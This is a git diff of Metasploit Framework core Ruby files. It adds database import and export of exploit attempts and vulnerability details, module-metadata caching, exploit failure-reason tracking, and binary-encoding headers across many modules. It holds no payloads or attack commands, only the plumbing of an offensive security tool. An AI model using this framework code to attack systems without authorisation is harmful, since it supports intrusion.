# report_exploit() used to be used to track sessions and which modules
# opened them. That information is now available with the session table
# directly. TODO: kill this completely some day -- for now just warn if
@@ -3305,6 +3697,29 @@ class DBManager
}
host_address = host_data[:host].dup # Preserve after report_host() deletes
hobj = report_host(host_data)
+
+ host.elements.each("host_details") do |hdet|
+ hdet_data = {}
+ hdet.elements.each do |det|
+ next if ["id", "host-id"].include?(det.name)
+ if det.text
+ hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
+ end
+ end
+ report_host_details(hobj, hdet_data)
+ end
+
+ host.elements.each("exploit_attempts") do |hdet|
+ hdet_data = {}
+ hdet.elements.each do |det|
+ next if ["id", "host-id", "session-id", "vuln-id", "service-id", "loot-id"].include?(det.name)
+ if det.text
+ hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
+ end
+ end
+ report_exploit_attempt(hobj, hdet_data)
+ end
+
host.elements.each('services/service') do |service|
service_data = {}
service_data[:workspace] = wspace
@@ -3322,6 +3737,7 @@ class DBManager
}
report_service(service_data)
end
+
host.elements.each('notes/note') do |note|
note_data = {}
note_data[:workspace] = wspace
@@ -3342,6 +3758,7 @@ class DBManager
}
report_note(note_data)
end
+
host.elements.each('tags/tag') do |tag|
tag_data = {}
tag_data[:addr] = host_address
@@ -3359,6 +3776,7 @@ class DBManager
end
report_host_tag(tag_data)
end
+
host.elements.each('vulns/vuln') do |vuln|
vuln_data = {}
vuln_data[:workspace] = wspace
@@ -3376,8 +3794,32 @@ class DBManager
vuln_data[:refs] << nils_for_nulls(ref.text.to_s.strip)
end
end
- report_vuln(vuln_data)
+
+ vobj = report_vuln(vuln_data)
+
+ vuln.elements.each("vuln_details") do |vdet|
+ vdet_data = {}
+ vdet.elements.each do |det|
+ next if ["id", "vuln-id"].include?(det.name)
+ if det.text
+ vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
+ end
+ end
+ report_vuln_details(vobj, vdet_data)
+ end
+
+ vuln.elements.each("vuln_attempts") do |vdet|
+ vdet_data = {}
+ vdet.elements.each do |det|
+ next if ["id", "vuln-id", "loot-id", "session-id"].include?(det.name)
+ if det.text
+ vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
+ end
+ end
+ report_vuln_attempt(vobj, vdet_data)
+ end
end
+
host.elements.each('creds/cred') do |cred|
cred_data = {}
cred_data[:workspace] = wspace
@@ -4614,26 +5056,50 @@ class DBManager
REXML::Document.parse_stream(data, parser)
end
- # This is starting to be more than just nmap -> msf, other
- # things are creeping in here. Consider renaming the method
- # and intentionally making it more general.
def nmap_msf_service_map(proto)
+ service_name_map(proto)
+ end
+
+ #
+ # This method normalizes an incoming service name to one of the
+ # the standard ones recognized by metasploit
+ #
+ def service_name_map(proto)
return proto unless proto.kind_of? String
case proto.downcase
- when "msrpc", "nfs-or-iis"; "dcerpc"
- when "netbios-ns"; "netbios"
- when "netbios-ssn", "microsoft-ds"; "smb"
- when "ms-sql-s"; "mssql"
- when "ms-sql-m"; "mssql-m"
+ when "msrpc", "nfs-or-iis", "dce endpoint resolution"
+ "dcerpc"
+ when "ms-sql-s", "tds"
+ "mssql"
+ when "ms-sql-m","microsoft sql monitor"
+ "mssql-m"
when "postgresql"; "postgres"
when "http-proxy"; "http"
when "iiimsf"; "db2"
when "oracle-tns"; "oracle"
when "quickbooksrds"; "metasploit"
+ when "microsoft remote display protocol"
+ "rdp"
+ when "vmware authentication daemon"
+ "vmauthd"
+ when "netbios-ns", "cifs name service"
+ "netbios"
+ when "netbios-ssn", "microsoft-ds", "cifs"
+ "smb"
+ when "remote shell"
+ "shell"
+ when "remote login"
+ "login"
+ when "nfs lockd"
+ "lockd"
+ when "hp jetdirect"
+ "jetdirect"
+ when "dhcp server"
+ "dhcp"
when /^dns-(udp|tcp)$/; "dns"
when /^dce[\s+]rpc$/; "dcerpc"
else
- proto.downcase
+ proto.downcase.gsub(/\s*\(.*/, '') # "service (some service)"
end
end
diff --git a/lib/msf/core/db_export.rb b/lib/msf/core/db_export.rb
index c83e932cfa..df305d32a9 100644
--- a/lib/msf/core/db_export.rb
+++ b/lib/msf/core/db_export.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
##
@@ -255,6 +256,13 @@ class Export
extract_web_vuln_info(report_file)
report_file.write %Q|\n|
+ yield(:status, "start", "module details") if block_given?
+ report_file.write %Q|\n|
+ report_file.flush
+ extract_module_detail_info(report_file)
+ report_file.write %Q|\n|
+
+
report_file.write %Q|\n|
report_file.flush
report_file.close
@@ -350,6 +358,96 @@ class Export
return el
end
+
+ def extract_module_detail_info(report_file)
+ Mdm::ModuleDetail.all.each do |m|
+ report_file.write("\n")
+ m_id = m.attributes["id"]
+
+ # Module attributes
+ m.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n") # Not checking types
+ end
+
+ # Authors sub-elements
+ report_file.write(" \n")
+ m.authors.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+ # Refs sub-elements
+ report_file.write(" \n")
+ m.refs.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+
+ # Archs sub-elements
+ report_file.write(" \n")
+ m.archs.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+
+ # Platforms sub-elements
+ report_file.write(" \n")
+ m.platforms.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+
+ # Targets sub-elements
+ report_file.write(" \n")
+ m.targets.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+ # Actions sub-elements
+ report_file.write(" \n")
+ m.actions.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+ # Mixins sub-elements
+ report_file.write(" \n")
+ m.mixins.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+ report_file.write("\n")
+ end
+ report_file.flush
+ end
+
# ActiveRecord's to_xml is easy and wrong. This isn't, on both counts.
def extract_host_info(report_file)
@hosts.each do |h|
@@ -362,6 +460,26 @@ class Export
report_file.write(" #{el}\n") # Not checking types
end
+ # Host details sub-elements
+ report_file.write(" \n")
+ h.host_details.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+ # Host exploit attempts sub-elements
+ report_file.write(" \n")
+ h.exploit_attempts.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
# Service sub-elements
report_file.write(" \n")
@services.find_all_by_host_id(host_id).each do |e|
@@ -394,6 +512,37 @@ class Export
el = create_xml_element(k,v)
report_file.write(" #{el}\n")
end
+
+ # References
+ report_file.write(" \n")
+ e.refs.each do |ref|
+ el = create_xml_element("ref",ref.name)
+ report_file.write(" #{el}\n")
+ end
+ report_file.write(" \n")
+
+
+ # Vuln details sub-elements
+ report_file.write(" \n")
+ e.vuln_details.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+
+ # Vuln attempts sub-elements
+ report_file.write(" \n")
+ e.vuln_attempts.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
report_file.write(" \n")
end
report_file.write(" \n")
diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb
index ff6cde05c0..40cab43b89 100644
--- a/lib/msf/core/db_manager.rb
+++ b/lib/msf/core/db_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "active_record"
require 'msf/core'
@@ -315,6 +316,181 @@ class DBManager
framework.db.find_workspace(@workspace_name)
end
+ def update_all_module_details
+ return if not self.migrated
+
+ ::ActiveRecord::Base.connection_pool.with_connection {
+
+ refresh = []
+ skipped = []
+
+ Mdm::ModuleDetail.find_each do |md|
+
+ unless md.ready
+ refresh << md
+ next
+ end
+
+ unless md.file and ::File.exists?(md.file)
+ refresh << md
+ next
+ end
+
+ if ::File.mtime(md.file).to_i != md.mtime.to_i
+ refresh << md
+ next
+ end
+
+ skipped << [md.mtype, md.refname]
+ end
+
+ refresh.each {|md| md.destroy }
+ refresh = nil
+
+ stime = Time.now.to_f
+ [
+ [ 'exploit', framework.exploits ],
+ [ 'auxiliary', framework.auxiliary ],
+ [ 'post', framework.post ],
+ [ 'payload', framework.payloads ],
+ [ 'encoder', framework.encoders ],
+ [ 'nop', framework.nops ]
+ ].each do |mt|
+ mt[1].keys.sort.each do |mn|
+ next if skipped.include?( [ mt[0], mn ] )
+ obj = mt[1].create(mn)
+ next if not obj
+ update_module_details(obj)
+ end
+ end
+
+ nil
+
+ }
+ end
+
+ def update_module_details(obj)
+ return if not self.migrated
+
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ info = module_to_details_hash(obj)
+ bits = info.delete(:bits) || []
+
+ md = Mdm::ModuleDetail.create(info)
+ bits.each do |args|
+ otype, vals = args
+ case otype
+ when :author
+ md.add_author(vals[:name], vals[:email])
+ when :action
+ md.add_action(vals[:name])
+ when :arch
+ md.add_arch(vals[:name])
+ when :platform
+ md.add_platform(vals[:name])
+ when :target
+ md.add_target(vals[:index], vals[:name])
+ when :ref
+ md.add_ref(vals[:name])
+ when :mixin
+ # md.add_mixin(vals[:name])
+ end
+ end
+
+ md.ready = true
+ md.save
+ md.id
+
+ }
+ end
+
+ def remove_module_details(mtype, refname)
+ return if not self.migrated
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ md = Mdm::ModuleDetail.find(:conditions => [ 'mtype = ? and refname = ?', mtype, refname])
+ md.destroy if md
+ }
+ end
+
+ def module_to_details_hash(m)
+ res = {}
+ bits = []
+
+ res[:mtime] = ::File.mtime(m.file_path) rescue Time.now
+ res[:file] = m.file_path
+ res[:mtype] = m.type
+ res[:name] = m.name.to_s
+ res[:refname] = m.refname
+ res[:fullname] = m.fullname
+ res[:rank] = m.rank.to_i
+ res[:license] = m.license.to_s
+
+ res[:description] = m.description.to_s.strip
+
+ m.arch.map{ |x|
+ bits << [ :arch, { :name => x.to_s } ]
+ }
+
+ m.platform.platforms.map{ |x|
+ bits << [ :platform, { :name => x.to_s.split('::').last.downcase } ]
+ }
+
+ m.author.map{|x|
+ bits << [ :author, { :name => x.to_s } ]
+ }
+
+ m.references.map do |r|
+ bits << [ :ref, { :name => [r.ctx_id.to_s, r.ctx_val.to_s].join("-") } ]
+ end
+
+ res[:privileged] = m.privileged?
+
+
+ if m.disclosure_date
+ begin
+ res[:disclosure_date] = m.disclosure_date.to_datetime.to_time
+ rescue ::Exception
+ res.delete(:disclosure_date)
+ end
+ end
+
+ if(m.type == "exploit")
+
+ m.targets.each_index do |i|
+ bits << [ :target, { :index => i, :name => m.targets[i].name.to_s } ]
+ end
+
+ if (m.default_target)
+ res[:default_target] = m.default_target
+ end
+
+ # Some modules are a combination, which means they are actually aggressive
+ res[:stance] = m.stance.to_s.index("aggressive") ? "aggressive" : "passive"
+
+
+ m.class.mixins.each do |x|
+ bits << [ :mixin, { :name => x.to_s } ]
+ end
+ end
+
+ if(m.type == "auxiliary")
+
+ m.actions.each_index do |i|
+ bits << [ :action, { :name => m.actions[i].name.to_s } ]
+ end
+
+ if (m.default_action)
+ res[:default_action] = m.default_action.to_s
+ end
+
+ res[:stance] = m.passive? ? "passive" : "aggressive"
+ end
+
+ res[:bits] = bits
+
+ res
+ end
+
end
end
diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb
index a85244faef..413d1e521f 100755
--- a/lib/msf/core/encoded_payload.rb
+++ b/lib/msf/core/encoded_payload.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'msf/core'
diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb
index e9d10d2b75..b1b17cab23 100644
--- a/lib/msf/core/encoder.rb
+++ b/lib/msf/core/encoder.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/encoder/alphanum.rb b/lib/msf/core/encoder/alphanum.rb
index 734f64ee6c..4f34450e1c 100644
--- a/lib/msf/core/encoder/alphanum.rb
+++ b/lib/msf/core/encoder/alphanum.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/encoder/nonalpha.rb b/lib/msf/core/encoder/nonalpha.rb
index 5cad9cd2e2..c0f6492aa6 100644
--- a/lib/msf/core/encoder/nonalpha.rb
+++ b/lib/msf/core/encoder/nonalpha.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/encoder/nonupper.rb b/lib/msf/core/encoder/nonupper.rb
index 8fac308d49..2084c01c70 100644
--- a/lib/msf/core/encoder/nonupper.rb
+++ b/lib/msf/core/encoder/nonupper.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/encoder/xor.rb b/lib/msf/core/encoder/xor.rb
index 4595c429a4..69b6db7d30 100644
--- a/lib/msf/core/encoder/xor.rb
+++ b/lib/msf/core/encoder/xor.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/encoder/xor_additive_feedback.rb b/lib/msf/core/encoder/xor_additive_feedback.rb
index 734239fdef..2f3e2cecb3 100644
--- a/lib/msf/core/encoder/xor_additive_feedback.rb
+++ b/lib/msf/core/encoder/xor_additive_feedback.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/encoding/xor.rb b/lib/msf/core/encoding/xor.rb
index bbb64cb9eb..e8b3a97e40 100644
--- a/lib/msf/core/encoding/xor.rb
+++ b/lib/msf/core/encoding/xor.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Encoding
diff --git a/lib/msf/core/event_dispatcher.rb b/lib/msf/core/event_dispatcher.rb
index 6f96456bda..a7f3929632 100644
--- a/lib/msf/core/event_dispatcher.rb
+++ b/lib/msf/core/event_dispatcher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exceptions.rb b/lib/msf/core/exceptions.rb
index 5cdb6583e2..a0a3b496a4 100644
--- a/lib/msf/core/exceptions.rb
+++ b/lib/msf/core/exceptions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exceptions.rb.ut.rb b/lib/msf/core/exceptions.rb.ut.rb
index a2921b46b0..f10326a339 100644
--- a/lib/msf/core/exceptions.rb.ut.rb
+++ b/lib/msf/core/exceptions.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
index 39409c2b95..20ab759c7e 100644
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/module'
@@ -28,6 +29,20 @@ end
###
class Exploit < Msf::Module
+
+ ##
+ # Exceptions
+ ##
+
+ # Indicate that the exploit should abort because it has completed
+ class Complete < RuntimeError
+ end
+
+ # Indicate that the exploit should abort because it has failed
+ class Failed < RuntimeError
+ end
+
+
##
#
# Default compatibility settings for exploit modules.
@@ -55,33 +70,108 @@ class Exploit < Msf::Module
#
# Can't tell if the target is exploitable or not.
#
- Unknown = [-1, "Cannot reliably check exploitability."]
+ Unknown = [ 'unknown', "Cannot reliably check exploitability."]
#
# The target is safe and is therefore not exploitable.
#
- Safe = [ 0, "The target is not exploitable." ]
+ Safe = [ 'safe', "The target is not exploitable." ]
#
# The target is running the service in question but may not be
# exploitable.
#
- Detected = [ 1, "The target service is running, but could not be validated." ]
+ Detected = [ 'detected', "The target service is running, but could not be validated." ]
#
# The target appears to be vulnerable.
#
- Appears = [ 2, "The target appears to be vulnerable." ]
+ Appears = [ 'appears', "The target appears to be vulnerable." ]
#
# The target is vulnerable.
#
- Vulnerable = [ 3, "The target is vulnerable." ]
+ Vulnerable = [ 'vulnerable', "The target is vulnerable." ]
#
# The exploit does not support the check method.
#
- Unsupported = [ 4, "This exploit does not support check." ]
+ Unsupported = [ 'unsupported', "This exploit does not support check." ]
+ end
+
+
+
+ ##
+ #
+ # Constants indicating the reason for an unsuccessful exploit attempt
+ #
+ ##
+ module Failure
+
+ #
+ # No confidence in success or failure
+ #
+ None = 'none'
+
+ #
+ # No confidence in success or failure
+ #
+ Unknown = 'unknown'
+
+ #
+ # The network service was unreachable (connection refused, etc)
+ #
+ Unreachable = 'unreachable'
+
+ #
+ # The exploit settings were incorrect
+ #
+ BadConfig = 'bad-config'
+
+ #
+ # The network service disconnected us mid-attempt
+ #
+ Disconnected = 'disconnected'
+
+ #
+ # The application endpoint or specific service was not found
+ #
+ NotFound = 'not-found'
+
+ #
+ # The application replied in an unexpected fashion
+ #
+ UnexpectedReply = 'unexpected-reply'
+
+ #
+ # The exploit triggered some form of timeout
+ #
+ TimeoutExpired = 'timeout-expired'
+
+ #
+ # The exploit was interrupted by the user
+ #
+ UserInterrupt = 'user-interrupt'
+
+ #
+ # The application replied indication we do not have access
+ #
+ NoAccess = 'no-access'
+
+ #
+ # The target is not compatible with this exploit or settings
+ #
+ NoTarget = 'no-target'
+
+ #
+ # The application response indicated it was not vulnerable
+ #
+ NotVulnerable = 'not-vulnerable'
+
+ #
+ # The payload was delivered but no session was opened (AV, network, etc)
+ #
+ PayloadFailed = 'payload-failed'
end
#
@@ -281,8 +371,10 @@ class Exploit < Msf::Module
[ Target ], 'Targets')
self.default_target = info['DefaultTarget']
self.payload_info = info['Payload'] || {}
+ self.successful = false
self.session_count = 0
self.active_timeout = 120
+ self.fail_reason = Failure::None
if (info['Payload'] and info['Payload']['ActiveTimeout'])
self.active_timeout = info['Payload']['ActiveTimeout'].to_i
@@ -1080,7 +1172,7 @@ class Exploit < Msf::Module
end
#
- # Generate random alphan lower characters avoiding the exploit's bad
+ # Generate random alpha lower characters avoiding the exploit's bad
# characters.
#
def rand_text_alpha_lower(length, bad=payload_badchars)
@@ -1176,6 +1268,7 @@ class Exploit < Msf::Module
#
def on_new_session(session)
self.session_count += 1
+ self.successful = true
end
#
@@ -1193,6 +1286,46 @@ class Exploit < Msf::Module
self.session_count = 0
end
+
+ ##
+ # Failure tracking
+ ##
+
+ def fail_with(reason,msg=nil)
+ self.fail_reason = reason
+ self.fail_detail = msg
+ raise Msf::Exploit::Failed, (msg || "No reason given")
+ end
+
+ def report_failure
+
+ return unless framework.db and framework.db.active
+
+ info = {
+ :timestamp => Time.now.utc,
+ :workspace => framework.db.find_workspace(self.workspace),
+ :module => self.fullname,
+ :fail_reason => self.fail_reason,
+ :fail_detail => self.fail_detail,
+ :target_name => self.target.name,
+ :username => self.owner,
+ :refs => self.references
+ }
+
+ if self.datastore['RHOST'] and self.options['RHOST']
+ info[:host] = self.datastore['RHOST']
+ end
+
+ if self.datastore['RPORT'] and self.options['RPORT']
+ info[:port] = self.datastore['RPORT']
+ if self.class.ancestors.include?(Msf::Exploit::Remote::Tcp)
+ info[:proto] = 'tcp'
+ end
+ end
+
+ framework.db.report_exploit_failure(info)
+ end
+
##
#
# Aliases
@@ -1215,6 +1348,16 @@ class Exploit < Msf::Module
#
##
+ #
+ # The reason why the exploit was not successful (one of Msf::Exploit::FailReason)
+ #
+ attr_accessor :fail_reason
+
+ #
+ # Detailed exception string indicating why the exploit was not successful
+ #
+ attr_accessor :fail_detail
+
#
# The list of targets.
#
@@ -1242,6 +1385,12 @@ class Exploit < Msf::Module
#
attr_reader :session_count
+ #
+ # The boolean indicating whether the exploit succeeded
+ #
+ attr_reader :successful
+
+
protected
#
@@ -1257,14 +1406,20 @@ protected
#
attr_writer :payload_info
#
- # Number of sessions created by this exploit instance.
+ # Number of sessions created by this exploit instance.
#
attr_writer :session_count
#
- # Maximum number of seconds for active handlers
+ # Maximum number of seconds for active handlers
#
attr_accessor :active_timeout
+ #
+ # Boolean indicating whether the exploit succeeded
+ #
+ attr_writer :successful
+
+
#
# Overrides the base class method and serves to initialize default
# compatibilities for exploits
diff --git a/lib/msf/core/exploit.rb.ut.rb b/lib/msf/core/exploit.rb.ut.rb
index 23fec69b54..494c091ce9 100644
--- a/lib/msf/core/exploit.rb.ut.rb
+++ b/lib/msf/core/exploit.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/msf/core/exploit/afp.rb b/lib/msf/core/exploit/afp.rb
index f2a855601e..a94d40f3d7 100644
--- a/lib/msf/core/exploit/afp.rb
+++ b/lib/msf/core/exploit/afp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/arkeia.rb b/lib/msf/core/exploit/arkeia.rb
index d8178bac81..649732ebf5 100644
--- a/lib/msf/core/exploit/arkeia.rb
+++ b/lib/msf/core/exploit/arkeia.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/browser_autopwn.rb b/lib/msf/core/exploit/browser_autopwn.rb
index 745df12eeb..a792abcc1e 100644
--- a/lib/msf/core/exploit/browser_autopwn.rb
+++ b/lib/msf/core/exploit/browser_autopwn.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/brute.rb b/lib/msf/core/exploit/brute.rb
index 80a3235eaa..c57528118f 100644
--- a/lib/msf/core/exploit/brute.rb
+++ b/lib/msf/core/exploit/brute.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/brutetargets.rb b/lib/msf/core/exploit/brutetargets.rb
index ef1c0a4b9a..659d473921 100644
--- a/lib/msf/core/exploit/brutetargets.rb
+++ b/lib/msf/core/exploit/brutetargets.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/capture.rb b/lib/msf/core/exploit/capture.rb
index 43e5687126..dc12ddcb92 100644
--- a/lib/msf/core/exploit/capture.rb
+++ b/lib/msf/core/exploit/capture.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index 65967cd4dc..5e2e551a54 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/cmdstager_debug_asm.rb b/lib/msf/core/exploit/cmdstager_debug_asm.rb
index 9732dd9add..979edb6bec 100644
--- a/lib/msf/core/exploit/cmdstager_debug_asm.rb
+++ b/lib/msf/core/exploit/cmdstager_debug_asm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/cmdstager_debug_write.rb b/lib/msf/core/exploit/cmdstager_debug_write.rb
index f25ca3628e..707369d2f7 100644
--- a/lib/msf/core/exploit/cmdstager_debug_write.rb
+++ b/lib/msf/core/exploit/cmdstager_debug_write.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb
index 032767f6a0..3b11683878 100644
--- a/lib/msf/core/exploit/cmdstager_tftp.rb
+++ b/lib/msf/core/exploit/cmdstager_tftp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/cmdstager_vbs.rb b/lib/msf/core/exploit/cmdstager_vbs.rb
index 879bc214dc..0f75595916 100644
--- a/lib/msf/core/exploit/cmdstager_vbs.rb
+++ b/lib/msf/core/exploit/cmdstager_vbs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb
index cbfa931745..b723abbc4a 100644
--- a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb
+++ b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: $
##
diff --git a/lib/msf/core/exploit/db2.rb b/lib/msf/core/exploit/db2.rb
index 3cc16fa3f6..c94ef17060 100644
--- a/lib/msf/core/exploit/db2.rb
+++ b/lib/msf/core/exploit/db2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/dcerpc.rb b/lib/msf/core/exploit/dcerpc.rb
index 5ab2e6f762..51b11c738b 100644
--- a/lib/msf/core/exploit/dcerpc.rb
+++ b/lib/msf/core/exploit/dcerpc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/dcerpc'
require 'rex/encoder/ndr'
require 'msf/core/exploit/dcerpc_epm'
diff --git a/lib/msf/core/exploit/dcerpc.rb.ut.rb b/lib/msf/core/exploit/dcerpc.rb.ut.rb
index 44123630e1..89b43df26e 100644
--- a/lib/msf/core/exploit/dcerpc.rb.ut.rb
+++ b/lib/msf/core/exploit/dcerpc.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', '..'))
diff --git a/lib/msf/core/exploit/dcerpc_epm.rb b/lib/msf/core/exploit/dcerpc_epm.rb
index e505ae75d8..da6e233460 100644
--- a/lib/msf/core/exploit/dcerpc_epm.rb
+++ b/lib/msf/core/exploit/dcerpc_epm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/dcerpc_lsa.rb b/lib/msf/core/exploit/dcerpc_lsa.rb
index 67d251f43e..568f7aca6e 100644
--- a/lib/msf/core/exploit/dcerpc_lsa.rb
+++ b/lib/msf/core/exploit/dcerpc_lsa.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/dcerpc_mgmt.rb b/lib/msf/core/exploit/dcerpc_mgmt.rb
index 664c68cc2d..139c43f78a 100644
--- a/lib/msf/core/exploit/dcerpc_mgmt.rb
+++ b/lib/msf/core/exploit/dcerpc_mgmt.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/dect_coa.rb b/lib/msf/core/exploit/dect_coa.rb
index aa58712f1c..c7fe22ba1b 100644
--- a/lib/msf/core/exploit/dect_coa.rb
+++ b/lib/msf/core/exploit/dect_coa.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/dhcp.rb b/lib/msf/core/exploit/dhcp.rb
index a74c0cbe66..655e70877f 100644
--- a/lib/msf/core/exploit/dhcp.rb
+++ b/lib/msf/core/exploit/dhcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/dialup.rb b/lib/msf/core/exploit/dialup.rb
index 530b351153..3ccd6732ce 100644
--- a/lib/msf/core/exploit/dialup.rb
+++ b/lib/msf/core/exploit/dialup.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Exploit::Remote::Dialup
diff --git a/lib/msf/core/exploit/egghunter.rb b/lib/msf/core/exploit/egghunter.rb
index 702dfce174..31db349cc1 100644
--- a/lib/msf/core/exploit/egghunter.rb
+++ b/lib/msf/core/exploit/egghunter.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/exploitation/egghunter'
diff --git a/lib/msf/core/exploit/exe.rb b/lib/msf/core/exploit/exe.rb
index 4f68679b51..e4d632d0ef 100644
--- a/lib/msf/core/exploit/exe.rb
+++ b/lib/msf/core/exploit/exe.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/fileformat.rb b/lib/msf/core/exploit/fileformat.rb
index fa03829eff..a21b09ec05 100644
--- a/lib/msf/core/exploit/fileformat.rb
+++ b/lib/msf/core/exploit/fileformat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# This module exposes a simple method to create a file.
